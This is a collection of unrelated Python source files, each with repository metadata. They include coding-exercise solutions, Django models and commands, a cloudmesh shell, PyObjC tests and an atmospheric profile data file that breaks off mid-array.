427ad4d206db8a5e4f376c716b47b039b82fba5a | 033da72a51c76e5510a06be93229a547a538cf28 | /Data Engineer with Python Track/03. Streamlined Data Ingestion with Pandas/Chapter/03. Importing Data from Databases/03-Selecting columns with SQL.py | 9ce77ea8c2536cbf0133ba6d5c5008e87273de10 | []
| no_license | ikhwan1366/Datacamp | d5dcd40c1bfeb04248977014260936b1fb1d3065 | 7738614eaebec446842d89177ae2bc30ab0f2551 | refs/heads/master | 2023-03-06T13:41:06.522721 | 2021-02-17T22:41:54 | 2021-02-17T22:41:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,327 | py | '''
Selecting columns with SQL
Datasets can contain columns that are not required for an analysis, like the weather table in data.db does. Some, such as elevation, are redundant, since all observations occurred at the same place, while others contain variables we are not interested in. After making a database engine, you'll write a query to SELECT only the date and temperature columns, and pass both to read_sql() to make a data frame of high and low temperature readings.
pandas has been loaded as pd, and create_engine() has been imported from sqlalchemy.
Note: The SQL checker is quite picky about column positions and expects fields to be selected in the specified order.
Instructions
100 XP
- Create a database engine for data.db.
- Write a SQL query that SELECTs the date, tmax, and tmin columns from the weather table.
- Make a data frame by passing the query and engine to read_sql() and assign the resulting data frame to temperatures.
'''
# Create database engine for data.db
engine = create_engine('sqlite:///data.db')
# Write query to get date, tmax, and tmin from weather
query = """
SELECT date,
tmax,
tmin
FROM weather;
"""
# Make a data frame by passing query and engine to read_sql()
temperatures = pd.read_sql(query, engine)
# View the resulting data frame
print(temperatures)
| [
"[email protected]"
]
| |
27c0b921e96a11906286be5d2fb8bac1c678ad1c | 20c20938e201a0834ccf8b5f2eb5d570d407ad15 | /abc152/abc152_f/9661160.py | 040bdabbffd7805e7f362fb6eff11285789dc375 | []
| no_license | kouhei-k/atcoder_submissions | 8e1a1fb30c38e0d443b585a27c6d134bf1af610a | 584b4fd842ccfabb16200998fe6652f018edbfc5 | refs/heads/master | 2021-07-02T21:20:05.379886 | 2021-03-01T12:52:26 | 2021-03-01T12:52:26 | 227,364,764 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,354 | py | import collections
from itertools import combinations
N = int(input())
ab = [tuple(map(int, input().split())) for i in range(N-1)]
M = int(input())
uv = [tuple(map(int, input().split())) for i in range(M)]
def popcount(x):
x = x - ((x >> 1) & 0x5555555555555555)
x = (x & 0x3333333333333333) + ((x >> 2) & 0x3333333333333333)
x = (x + (x >> 4)) & 0x0f0f0f0f0f0f0f0f
x = x + (x >> 8)
x = x + (x >> 16)
x = x + (x >> 32)
return x & 0x0000007f
G = [[-1]*N for i in range(N)]
for i in range(N-1):
a, b = ab[i]
a -= 1
b -= 1
G[a][b] = i
G[b][a] = i
q = collections.deque()
G2 = [[0 for j in range(N)] for i in range(N)]
for i in range(N):
q.append((i, 0))
reached = [False]*N
reached[i] = True
while(q):
x, s = q.popleft()
for y in range(N):
if G[x][y] == -1 or reached[y]:
continue
else:
G2[i][y] = s | (1 << G[x][y])
q.append((y, s | 1 << G[x][y]))
reached[y] = True
ans = 2**(N-1)
ans2 = 0
for i in range(1, 2**M):
tmp = 2**(N-1) - 1
for j in range(M):
if (i >> j) % 2 == 1:
u, v = uv[j]
u -= 1
v -= 1
tmp &= ~G2[u][v]
ans2 += ((-1)**(popcount(i)-1)) * (1 << popcount(tmp))
# print(ans2, i)
print(ans-ans2)
| [
"[email protected]"
]
| |
f37bf6d7e69087bad285023e03ef4723bb8ba36b | 397e125e94f4f139f2bf5055824d81f24b8b1757 | /ABC/145/B.py | c96cb419eb5372858a0ff144fa21e734a83f0e9e | []
| no_license | tails1434/Atcoder | ecbab6ee238e3f225551297db961b1b502841fa4 | e7c7fed36be46bbaaf020a70997842240ba98d62 | refs/heads/master | 2021-07-07T00:31:49.235625 | 2020-09-30T01:42:01 | 2020-09-30T01:42:01 | 189,009,622 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 265 | py | def main():
N = int(input())
S = input()
if N % 2 != 0:
print('No')
else:
A = S[:N//2]
B = S[N//2:N]
if A == B:
print('Yes')
else:
print('No')
if __name__ == "__main__":
main() | [
"[email protected]"
]
| |
9900fb23966c7170f49463766fb9144b67096696 | 6323bd983f6304d95e62909bfc4883d2f9ef1a14 | /Leetcode/Medium/Range Sum query.py | 4e7d5a0537c1ad2d9022d5981e76015b68d98328 | []
| no_license | akshay-sahu-dev/PySolutions | 4c2d67d5f66fe83a6e302e1742a5bf17dafe2b99 | 83552962805768914034a284bf39197f52ca5017 | refs/heads/master | 2023-06-17T06:36:50.252943 | 2021-07-09T17:28:53 | 2021-07-09T17:28:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 355 | py | ## https://leetcode.com/problems/range-sum-query-immutable
class NumArray:
def __init__(self, nums: List[int]):
self.nums = nums
def sumRange(self, i: int, j: int) -> int:
return sum(self.nums[i:j+1])
# Your NumArray object will be instantiated and called as such:
# obj = NumArray(nums)
# param_1 = obj.sumRange(i,j) | [
"[email protected]"
]
| |
d81bf82845c2f8e12980533f9d59d8e047901438 | e07da133c4efa517e716af2bdf67a46f88a65b42 | /hub20/apps/blockchain/management/commands/sync_blockchain.py | b28399a2a20dc1fa41b00b74038c1e23e9e449e6 | [
"MIT"
]
| permissive | cryptobuks1/hub20 | be1da5f77a884f70068fd41edaa45d5e65b7c35e | 3a4d9cf16ed9d91495ac1a28c464ffb05e9f837b | refs/heads/master | 2022-04-19T21:26:15.386567 | 2020-04-19T07:17:47 | 2020-04-19T07:17:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,304 | py | import asyncio
import logging
from django.core.management.base import BaseCommand
from hub20.apps.blockchain.app_settings import START_BLOCK_NUMBER
from hub20.apps.blockchain.models import Block, make_web3
logger = logging.getLogger(__name__)
def split_block_lists(block_numbers, group_size=25):
for n in range(0, len(block_numbers), group_size):
yield block_numbers[n : n + group_size]
async def make_blocks_in_range(w3, start, end, speed=25):
chain_id = int(w3.net.version)
chain_blocks = Block.objects.filter(chain=chain_id)
block_range = (start, end)
recorded_block_set = set(
chain_blocks.filter(number__range=block_range).values_list("number", flat=True)
)
range_set = set(range(*block_range))
missing_blocks = list(range_set.difference(recorded_block_set))[::-1]
counter = 0
logger.info(f"{len(missing_blocks)} missing blocks between {start} and {end}")
for block_list in split_block_lists(missing_blocks, group_size=speed):
for block_number in block_list:
counter += 1
if (counter % speed) == 0:
await asyncio.sleep(1)
Block.make_all(block_number, w3)
else:
await asyncio.sleep(1)
async def save_new_blocks(w3):
current_block_number = w3.eth.blockNumber
while True:
logger.info(f"Current block number: {current_block_number}")
block_number = w3.eth.blockNumber
if block_number > current_block_number:
Block.make_all(block_number, w3)
current_block_number = block_number
else:
await asyncio.sleep(5)
async def backfill(w3):
SCAN_SIZE = 5000
end = w3.eth.blockNumber
while end > START_BLOCK_NUMBER:
start = max(end - SCAN_SIZE, START_BLOCK_NUMBER)
await make_blocks_in_range(w3, start, end)
end = start
logger.info(f"Backfill complete. All blocks from {end} now recorded")
class Command(BaseCommand):
help = "Listens to new blocks and transactions on event loop and saves on DB"
def handle(self, *args, **options):
w3 = make_web3()
loop = asyncio.get_event_loop()
try:
loop.run_until_complete(asyncio.gather(save_new_blocks(w3), backfill(w3)))
finally:
loop.close()
| [
"[email protected]"
]
| |
ade677f8e988685507a1c948ac73be652ce39b49 | f0d3b759d9b0d2000cea2c291a4974e157651216 | /apps/goods/migrations/0001_initial.py | 303ea309f8cf6f7ee582bdc2901bd642b7490841 | []
| no_license | PYBPYB/Fresh-every-day | 526265ae0a9b1fe8e8f8944e0320ea8a47b8571c | 5b62fda9effe327a5da9ce45644bf44ee9d7108f | refs/heads/master | 2020-04-12T14:39:31.325736 | 2019-05-31T02:31:54 | 2019-05-31T02:31:54 | 162,558,199 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,310 | py | # Generated by Django 2.1.3 on 2018-11-26 09:10
from django.db import migrations, models
import django.db.models.deletion
import tinymce.models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Goods',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('create_time', models.DateField(auto_now_add=True, verbose_name='创建时间')),
('update_time', models.DateField(auto_now=True, verbose_name='更新时间')),
('is_delete', models.BooleanField(default=False, verbose_name='删除标记')),
('name', models.CharField(max_length=20, verbose_name='商品SPU名称')),
('detail', tinymce.models.HTMLField(blank=True, verbose_name='商品详情')),
],
options={
'verbose_name': '商品SPU',
'verbose_name_plural': '商品SPU',
'db_table': 'df_goods',
},
),
migrations.CreateModel(
name='GoodsImage',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('create_time', models.DateField(auto_now_add=True, verbose_name='创建时间')),
('update_time', models.DateField(auto_now=True, verbose_name='更新时间')),
('is_delete', models.BooleanField(default=False, verbose_name='删除标记')),
('image', models.ImageField(upload_to='goods', verbose_name='图片路径')),
],
options={
'verbose_name': '商品图片',
'verbose_name_plural': '商品图片',
'db_table': 'df_goods_image',
},
),
migrations.CreateModel(
name='GoodsSKU',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('create_time', models.DateField(auto_now_add=True, verbose_name='创建时间')),
('update_time', models.DateField(auto_now=True, verbose_name='更新时间')),
('is_delete', models.BooleanField(default=False, verbose_name='删除标记')),
('name', models.CharField(max_length=20, verbose_name='商品名称')),
('desc', models.CharField(max_length=250, verbose_name='商品简介')),
('price', models.DecimalField(decimal_places=2, max_digits=10, verbose_name='商品价格')),
('unite', models.CharField(max_length=20, verbose_name='商品单位')),
('image', models.ImageField(upload_to='goods', verbose_name='商品图片')),
('stock', models.IntegerField(default=1, verbose_name='商品库存')),
('sales', models.IntegerField(default=0, verbose_name='商品销量')),
('status', models.SmallIntegerField(choices=[(0, '下架'), (1, '上架')], default=1, verbose_name='是否上架')),
('goods', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='goods.Goods', verbose_name='商品SPU')),
],
options={
'verbose_name': '商品',
'verbose_name_plural': '商品',
'db_table': 'df_goods_sku',
},
),
migrations.CreateModel(
name='GoodsType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('create_time', models.DateField(auto_now_add=True, verbose_name='创建时间')),
('update_time', models.DateField(auto_now=True, verbose_name='更新时间')),
('is_delete', models.BooleanField(default=False, verbose_name='删除标记')),
('name', models.CharField(max_length=20, verbose_name='种类名称')),
('logo', models.CharField(max_length=20, verbose_name='标识')),
('image', models.ImageField(upload_to='type', verbose_name='商品类型图片')),
],
options={
'verbose_name': '商品种类',
'verbose_name_plural': '商品种类',
'db_table': 'df_goods_type',
},
),
migrations.CreateModel(
name='IndexGoodsBanner',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('create_time', models.DateField(auto_now_add=True, verbose_name='创建时间')),
('update_time', models.DateField(auto_now=True, verbose_name='更新时间')),
('is_delete', models.BooleanField(default=False, verbose_name='删除标记')),
('image', models.ImageField(upload_to='banner', verbose_name='图片')),
('index', models.SmallIntegerField(default=0, verbose_name='展示顺序')),
('sku', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='goods.GoodsSKU', verbose_name='商品')),
],
options={
'verbose_name': '首页轮播商品',
'verbose_name_plural': '首页轮播商品',
'db_table': 'df_index_banner',
},
),
migrations.CreateModel(
name='IndexPromotionBanner',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('create_time', models.DateField(auto_now_add=True, verbose_name='创建时间')),
('update_time', models.DateField(auto_now=True, verbose_name='更新时间')),
('is_delete', models.BooleanField(default=False, verbose_name='删除标记')),
('name', models.CharField(max_length=20, verbose_name='活动名称')),
('url', models.URLField(verbose_name='活动链接')),
('image', models.ImageField(upload_to='banner', verbose_name='活动图片')),
('index', models.SmallIntegerField(default=0, verbose_name='展示顺序')),
],
options={
'verbose_name': '主页促销活动',
'verbose_name_plural': '主页促销活动',
'db_table': 'df_index_promotion',
},
),
migrations.CreateModel(
name='IndexTypeBanner',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('create_time', models.DateField(auto_now_add=True, verbose_name='创建时间')),
('update_time', models.DateField(auto_now=True, verbose_name='更新时间')),
('is_delete', models.BooleanField(default=False, verbose_name='删除标记')),
('display_type', models.SmallIntegerField(choices=[(0, '不展示'), (1, '展示')], default=1, verbose_name='展示表示')),
('index', models.SmallIntegerField(default=0, verbose_name='展示顺序')),
('sku', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='goods.GoodsSKU', verbose_name='商品SKU')),
('type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='goods.GoodsType', verbose_name='商品类型')),
],
options={
'verbose_name': '主页分类展示商品',
'verbose_name_plural': '主页分类展示商品',
'db_table': 'df_index_type_goods',
},
),
migrations.AddField(
model_name='goodssku',
name='type',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='goods.GoodsType', verbose_name='商品种类'),
),
migrations.AddField(
model_name='goodsimage',
name='sku',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='goods.GoodsSKU', verbose_name='商品'),
),
]
| [
"[email protected]"
]
| |
17886f2c49f51a24b121c87812d0111097c21985 | f47755f746c316cfdac8afaefe6d149aa77bc4e5 | /cloudmesh/rest/shell/shell.py | 052d890a4c3d2c4cb6cea1c4671b1c59ab97593b | [
"Apache-2.0"
]
| permissive | karthik-anba/rest | a3705b9349ebf7e6e1b4f21036301529adfd3dc8 | b575a5bc16a5352f87c107fadb435935d5b66746 | refs/heads/master | 2021-01-21T10:46:23.433663 | 2017-02-23T01:20:23 | 2017-02-23T01:20:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,358 | py | #
# in our rest architecture we want to interface to the backend systems while
# using a secure rest service. I
# Internally we will use the many fnctions that cloudmesh_client provides.
# Before we use them we need to implement some elementary functions
# lets first do administrative functions in an admin commond
# pseudo code: task implement
from __future__ import print_function
import importlib
import pkgutil
import pydoc
import sys
import textwrap
from cmd import Cmd
from cloudmesh_client.shell.command import PluginCommand
from cloudmesh_client.shell.command import command
import cloudmesh
from cloudmesh.rest.server. mongo import Mongo
import inspect
from cloudmesh_client.common.dotdict import dotdict
def print_list(elements):
for name in elements:
print("*", name)
class plugin(object):
@classmethod
def modules(cls):
module_list = []
package = cloudmesh
for importer, modname, ispkg in pkgutil.walk_packages(path=package.__path__,
prefix=package.__name__ + '.',
onerror=lambda x: None):
module_list.append(modname)
return module_list
@classmethod
def classes(cls):
module_list = cls.modules()
commands = []
for module in module_list:
if module.startswith('cloudmesh.ext.command.'):
commands.append(module)
return commands
@classmethod
def name(cls, command):
command_name = "do_" + command
class_name = "cloudmesh.ext.command." + command + "." \
+ command.capitalize() + "Command"
return class_name, command_name
@classmethod
def class_name(cls, command):
return "cloudmesh.ext.command." + command + "." \
+ command.capitalize() + "Command"
@classmethod
def load(cls, commands=None):
"""
:param commands: If None the commands will be found from import cloudmesh
Otherwise the commands can be explicitly specified with
commands = [
'cloudmesh.ext.command.bar.BarCommand',
'cloudmesh.ext.command.foo.FooCommand',
]
A namespace packege must exists. Foo and Bar ar just examples
:return: the classes of the command
"""
if commands is None:
commands = [c.split('.')[-1] for c in cls.classes()]
# print_list(commands)
COMMANDS = [cls.class_name(c) for c in commands]
commands = [getattr(importlib.import_module(mod), cls) for (mod, cls) in
(commands.rsplit(".", 1) for commands in COMMANDS)]
return commands
plugin.load()
PluginCommandClasses = type(
'CommandProxyClass',
tuple(PluginCommand.__subclasses__()),
{})
class CMShell(Cmd, PluginCommandClasses):
prompt = 'cms> '
banner = textwrap.dedent("""
+=======================================================+
. ____ _ _ _ .
. / ___| | ___ _ _ __| |_ __ ___ ___ ___| |__ .
. | | | |/ _ \| | | |/ _` | '_ ` _ \ / _ \/ __| '_ \ .
. | |___| | (_) | |_| | (_| | | | | | | __/\__ \ | | | .
. \____|_|\___/ \__,_|\__,_|_| |_| |_|\___||___/_| |_| .
+=======================================================+
Cloudmesh Rest Shell
""")
#
# List all commands that start with do
#
@command
def do_help(self, args, arguments):
"""
::
Usage:
help
Description:
help - List of all registered commands
"""
print("Help")
print("====")
methodList = [n for n, v in inspect.getmembers(self, inspect.ismethod)]
functionList = [n for n, v in inspect.getmembers(self, inspect.isfunction)]
commands = methodList + functionList
for c in sorted(commands):
if c.startswith("do_"):
print(c.replace("do_", ""), end=' ')
print ()
return ""
@command
def do_info(self, args, arguments):
"""
::
Usage:
info [commands|package|help]
Description:
info
provides internal info about the shell and its packages
"""
arguments = dotdict(arguments)
module_list = plugin.modules()
if arguments.commands:
commands = plugin.classes()
print_list(commands)
elif arguments.help:
for name in module_list:
p = "cloudmesh." + name
strhelp = p + " not found."
try:
strhelp = pydoc.render_doc(p, "Help on %s" + "\n" + 79 * "=")
except Exception, e:
pass
print(strhelp)
else:
print_list(module_list)
@command
def do_admin(self, args, arguments):
"""
::
Usage:
admin [db|rest] start
admin [db|rest] stop
admin db backup
admin db reset
admin status
Description:
db start
starts the database service
db stop
stops the database service
db backup
creates abackup of the database
db reset
resets the database
Arguments:
FILE a file name
Options:
-f specify the file
"""
arguments = dotdict(arguments)
print(arguments)
if arguments.db and arguments.stop:
print("PLEASE stop db")
m = Mongo()
m.stop()
elif arguments.db and arguments.start:
print("PLEASE start db")
m = Mongo()
m.start()
elif arguments.rest and arguments.start:
print("PLEASE start rest")
# m = Eve()
# m.start()
elif arguments.rest and arguments.stop:
print("PLEASE stop rest")
# m = Eve()
# m.stop()
elif arguments.start:
m = Mongo()
r = m.start()
print(r)
# start mong, start eve
pass
elif arguments.stop:
m = Mongo()
r = m.stop()
print(r)
# stop eve
pass
elif arguments.status:
m = Mongo()
r = m.status()
print(r)
def preloop(self):
"""adds the banner to the preloop"""
lines = textwrap.dedent(self.banner).split("\n")
for line in lines:
# Console.cprint("BLUE", "", line)
print(line)
# noinspection PyUnusedLocal
def do_EOF(self, args):
"""
::
Usage:
EOF
Description:
Command to the shell to terminate reading a script.
"""
return True
# noinspection PyUnusedLocal
def do_quit(self, args):
"""
::
Usage:
quit
Description:
Action to be performed whne quit is typed
"""
return True
do_q = do_quit
def emptyline(self):
return
#def main():
# CMShell().cmdloop()
def inheritors(klass):
subclasses = set()
work = [klass]
while work:
parent = work.pop()
for child in parent.__subclasses__():
if child not in subclasses:
subclasses.add(child)
work.append(child)
return subclasses
def do_gregor(line):
print("gregor")
# noinspection PyBroadException
def main():
"""cms.
Usage:
cms --help
cms [--echo] [--debug] [--nosplash] [-i] [COMMAND ...]
Arguments:
COMMAND A command to be executed
Options:
--file=SCRIPT -f SCRIPT Executes the script
-i After start keep the shell interactive,
otherwise quit [default: False]
--nosplash do not show the banner [default: False]
"""
def manual():
print(main.__doc__)
args = sys.argv[1:]
arguments = {
'--echo': '--echo' in args,
'--help': '--help' in args,
'--debug': '--debug' in args,
'--nosplash': '--nosplash' in args,
'-i': '-i' in args}
echo = arguments["--echo"]
if arguments['--help']:
manual()
sys.exit()
for a in args:
if a in arguments:
args.remove(a)
arguments['COMMAND'] = [' '.join(args)]
commands = arguments["COMMAND"]
if len(commands) > 0:
if ".cm" in commands[0]:
arguments["SCRIPT"] = commands[0]
commands = commands[1:]
else:
arguments["SCRIPT"] = None
arguments["COMMAND"] = ' '.join(commands)
if arguments["COMMAND"] == '':
arguments["COMMAND"] = None
# noinspection PySimplifyBooleanCheck
if arguments['COMMAND'] == []:
arguments['COMMAND'] = None
splash = not arguments['--nosplash']
debug = arguments['--debug']
interactive = arguments['-i']
script = arguments["SCRIPT"]
command = arguments["COMMAND"]
#context = CloudmeshContext(
# interactive=interactive,
# debug=debug,
# echo=echo,
# splash=splash)
cmd = CMShell()
# if script is not None:
# cmd.do_exec(script)
try:
if echo:
print(cmd.prompt, command)
if command is not None:
cmd.precmd(command)
stop = cmd.onecmd(command)
cmd.postcmd(stop, command)
except Exception as e:
print("ERROR: executing command '{0}'".format(command))
print(70 * "=")
print(e)
print(70 * "=")
if interactive or (command is None and script is None):
cmd.cmdloop()
if __name__ == '__main__':
main()
| [
"[email protected]"
]
| |
e3656c3a8b753864e8154ec4f8a46ac7e789e3b0 | 9decd5901a491d08e9235abc7fb8dade362d215e | /pastepwn/database/__init__.py | d67e426275658725e14ea82b809b9e95828cb0b9 | [
"MIT"
]
| permissive | jonahrosenblum/pastepwn | b4e7644fefd289d8ffb2a1cc6e77224dd1545c46 | 26c9e426a195d403894f00638eca6c5687cbd959 | refs/heads/master | 2021-01-02T22:03:26.922322 | 2020-02-04T23:36:08 | 2020-02-04T23:36:08 | 239,809,524 | 0 | 0 | MIT | 2020-02-11T16:27:06 | 2020-02-11T16:27:05 | null | UTF-8 | Python | false | false | 209 | py | # -*- coding: utf-8 -*-
from .abstractdb import AbstractDB
from .mongodb import MongoDB
from .mysqldb import MysqlDB
from .sqlitedb import SQLiteDB
__all__ = ('AbstractDB', 'MongoDB', 'SQLiteDB', 'MysqlDB')
| [
"[email protected]"
]
| |
be0d795ee4a482be60cebd7782452cdb1ec3243e | 5593b35f326748f18053e7ea042c98fe6b70a850 | /tqt/function/_utils.py | fcfe437056c27c6c9f5efbfe6e9d8517486bdff4 | [
"BSD-3-Clause"
]
| permissive | sicdl/TQT | 7dfe3bce2bb5dace9a467945512e65525a0c3be9 | 27b73fcf27ddfb67cd28f6ed27e49341f27c9f16 | refs/heads/main | 2023-04-14T18:28:23.224689 | 2021-04-22T14:46:46 | 2021-04-22T14:46:46 | 362,503,682 | 0 | 0 | BSD-3-Clause | 2021-04-28T14:45:14 | 2021-04-28T14:45:13 | null | UTF-8 | Python | false | false | 153 | py | import torch
def number_to_tensor(x, t):
r'''
Turn x in to a tensor with data type like tensor t.
'''
return torch.tensor(x).type_as(t) | [
"[email protected]"
]
| |
f7322bfe24f366e1da7e22987d6cb7ed70e9b213 | 2031771d8c226806a0b35c3579af990dd0747e64 | /pyobjc-framework-SecurityInterface/PyObjCTest/test_sfchooseidentitypanel.py | 128a8fe463da4b1756ea2b16a7730993712ab6e7 | [
"MIT"
]
| permissive | GreatFruitOmsk/pyobjc-mirror | a146b5363a5e39181f09761087fd854127c07c86 | 4f4cf0e4416ea67240633077e5665f5ed9724140 | refs/heads/master | 2018-12-22T12:38:52.382389 | 2018-11-12T09:54:18 | 2018-11-12T09:54:18 | 109,211,701 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 830 | py | from PyObjCTools.TestSupport import *
import SecurityInterface
class TestSFChooseIdentityPanelHelper (SecurityInterface.NSObject):
def chooseIdentityPanelShowHelp_(self, v): return 1
class TestSFChooseIdentityPanel (TestCase):
def test_classes(self):
SecurityInterface.SFChooseIdentityPanel
def test_methods(self):
self.assertArgIsSEL(SecurityInterface.SFChooseIdentityPanel.beginSheetForWindow_modalDelegate_didEndSelector_contextInfo_identities_message_, 2, b'v@:@'+objc._C_NSInteger+b'^v')
self.assertArgIsBOOL(SecurityInterface.SFChooseIdentityPanel.setShowsHelp_, 0)
self.assertResultIsBOOL(SecurityInterface.SFChooseIdentityPanel.showsHelp)
self.assertResultIsBOOL(TestSFChooseIdentityPanelHelper.chooseIdentityPanelShowHelp_)
if __name__ == "__main__":
main()
| [
"[email protected]"
]
| |
d3159cc0e9ff7137a95d0711e6f9b502070a0fda | 0667af1539008f9c6c0dcde2d3f50e8bbccf97f3 | /source/rttov_test/profile-datasets-py/div52_zen50deg/036.py | a78064452fb7611b980d7bf251e9df26e12cb8da | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
]
| permissive | bucricket/projectMAScorrection | bc6b90f07c34bf3e922225b2c7bd680955f901ed | 89489026c8e247ec7c364e537798e766331fe569 | refs/heads/master | 2021-01-22T03:54:21.557485 | 2019-03-10T01:47:32 | 2019-03-10T01:47:32 | 81,468,938 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,625 | py | """
Profile ../profile-datasets-py/div52_zen50deg/036.py
file automaticaly created by prof_gen.py script
"""
self["ID"] = "../profile-datasets-py/div52_zen50deg/036.py"
self["Q"] = numpy.array([ 1.60776800e+00, 4.99817300e+00, 4.07414300e+00,
6.67667600e+00, 8.13295200e+00, 7.49870800e+00,
4.95508500e+00, 7.24563000e+00, 5.96519400e+00,
4.81720300e+00, 5.67166500e+00, 5.44611200e+00,
5.89519200e+00, 3.89188700e+00, 4.59972100e+00,
4.77842400e+00, 4.27284700e+00, 4.33680400e+00,
4.22628600e+00, 3.86177400e+00, 4.34807400e+00,
4.12327700e+00, 3.82283400e+00, 4.05055800e+00,
4.04113600e+00, 3.89531200e+00, 4.07803400e+00,
4.26075700e+00, 3.93224200e+00, 3.64382500e+00,
3.69615800e+00, 3.74678700e+00, 3.58848600e+00,
3.42693800e+00, 3.36090700e+00, 3.33667800e+00,
3.40327200e+00, 3.65646200e+00, 3.90278800e+00,
3.68729900e+00, 3.43068400e+00, 3.27563100e+00,
3.23161100e+00, 3.23582300e+00, 5.48813900e+00,
7.68749100e+00, 1.12740300e+01, 1.58383200e+01,
1.87049700e+01, 1.11524200e+01, 3.76257500e+00,
3.06379300e+01, 7.11222300e+01, 8.68246900e+01,
4.55990700e+01, 5.19350000e+00, 1.12110900e+02,
2.31250900e+02, 2.15328600e+02, 9.40471000e+01,
2.87742000e+00, 7.10424400e+00, 1.12544100e+01,
2.41607900e+02, 4.85529300e+02, 1.16292500e+03,
2.05753200e+03, 2.78321900e+03, 3.28114300e+03,
3.78251900e+03, 4.31976100e+03, 4.85350100e+03,
5.47782800e+03, 6.09185800e+03, 6.74157700e+03,
7.38341400e+03, 8.12011400e+03, 8.85724900e+03,
9.79029700e+03, 1.07286700e+04, 1.20882700e+04,
1.35251300e+04, 1.54343700e+04, 1.68775400e+04,
1.76879400e+04, 1.85843900e+04, 1.95199900e+04,
2.05302800e+04, 2.16585600e+04, 2.29002800e+04,
2.42792600e+04, 2.57725100e+04, 2.74135100e+04,
2.90645600e+04, 3.04254300e+04, 3.19978400e+04,
3.40990700e+04, 3.55844500e+04, 3.46182900e+04,
3.36907600e+04, 3.27995700e+04])
self["P"] = numpy.array([ 5.00000000e-03, 1.61000000e-02, 3.84000000e-02,
7.69000000e-02, 1.37000000e-01, 2.24400000e-01,
3.45400000e-01, 5.06400000e-01, 7.14000000e-01,
9.75300000e-01, 1.29720000e+00, 1.68720000e+00,
2.15260000e+00, 2.70090000e+00, 3.33980000e+00,
4.07700000e+00, 4.92040000e+00, 5.87760000e+00,
6.95670000e+00, 8.16550000e+00, 9.51190000e+00,
1.10038000e+01, 1.26492000e+01, 1.44559000e+01,
1.64318000e+01, 1.85847000e+01, 2.09224000e+01,
2.34526000e+01, 2.61829000e+01, 2.91210000e+01,
3.22744000e+01, 3.56504000e+01, 3.92566000e+01,
4.31001000e+01, 4.71882000e+01, 5.15278000e+01,
5.61259000e+01, 6.09895000e+01, 6.61252000e+01,
7.15398000e+01, 7.72395000e+01, 8.32310000e+01,
8.95203000e+01, 9.61138000e+01, 1.03017000e+02,
1.10237000e+02, 1.17777000e+02, 1.25646000e+02,
1.33846000e+02, 1.42385000e+02, 1.51266000e+02,
1.60496000e+02, 1.70078000e+02, 1.80018000e+02,
1.90320000e+02, 2.00989000e+02, 2.12028000e+02,
2.23441000e+02, 2.35234000e+02, 2.47408000e+02,
2.59969000e+02, 2.72919000e+02, 2.86262000e+02,
3.00000000e+02, 3.14137000e+02, 3.28675000e+02,
3.43618000e+02, 3.58966000e+02, 3.74724000e+02,
3.90892000e+02, 4.07474000e+02, 4.24470000e+02,
4.41882000e+02, 4.59712000e+02, 4.77961000e+02,
4.96630000e+02, 5.15720000e+02, 5.35232000e+02,
5.55167000e+02, 5.75525000e+02, 5.96306000e+02,
6.17511000e+02, 6.39140000e+02, 6.61192000e+02,
6.83667000e+02, 7.06565000e+02, 7.29886000e+02,
7.53627000e+02, 7.77789000e+02, 8.02371000e+02,
8.27371000e+02, 8.52788000e+02, 8.78620000e+02,
9.04866000e+02, 9.31523000e+02, 9.58591000e+02,
9.86066000e+02, 1.01395000e+03, 1.04223000e+03,
1.07092000e+03, 1.10000000e+03])
self["CO2"] = numpy.array([ 341.2305, 341.2293, 341.2296, 341.2287, 341.2282, 341.2284,
341.2293, 341.2285, 341.229 , 341.2294, 341.2291, 341.2291,
341.229 , 341.2297, 341.2294, 341.2294, 341.2295, 341.2295,
341.2296, 341.2297, 341.2295, 341.2296, 341.2297, 341.2296,
341.2296, 341.2297, 341.2296, 341.2295, 341.2297, 341.2298,
341.2297, 341.8187, 342.4488, 343.1208, 343.8348, 344.5929,
345.3958, 346.2457, 347.1426, 348.0887, 349.0838, 350.1309,
351.2299, 351.2299, 351.2291, 351.2283, 351.227 , 351.2254,
351.2244, 351.2271, 351.2297, 351.2202, 351.206 , 351.2005,
351.215 , 351.2292, 351.1916, 351.1498, 351.1554, 351.198 ,
351.23 , 351.2285, 351.227 , 351.1461, 351.0605, 350.8225,
350.5083, 350.2534, 350.0786, 349.9025, 349.7138, 349.5263,
349.307 , 349.0914, 348.8631, 348.6377, 348.379 , 348.1201,
347.7923, 347.4628, 346.9852, 346.4806, 345.81 , 345.3031,
345.0184, 344.7036, 344.375 , 344.0201, 343.6238, 343.1877,
342.7034, 342.1789, 341.6025, 341.0226, 340.5446, 339.9924,
339.2543, 338.7326, 339.072 , 339.3978, 339.7108])
self["T"] = numpy.array([ 172.975, 188.884, 204.715, 216.336, 228.403, 234.187,
241.954, 252.632, 263.577, 265.794, 263.43 , 259.566,
253.694, 249.53 , 247.304, 243.998, 242.007, 241.244,
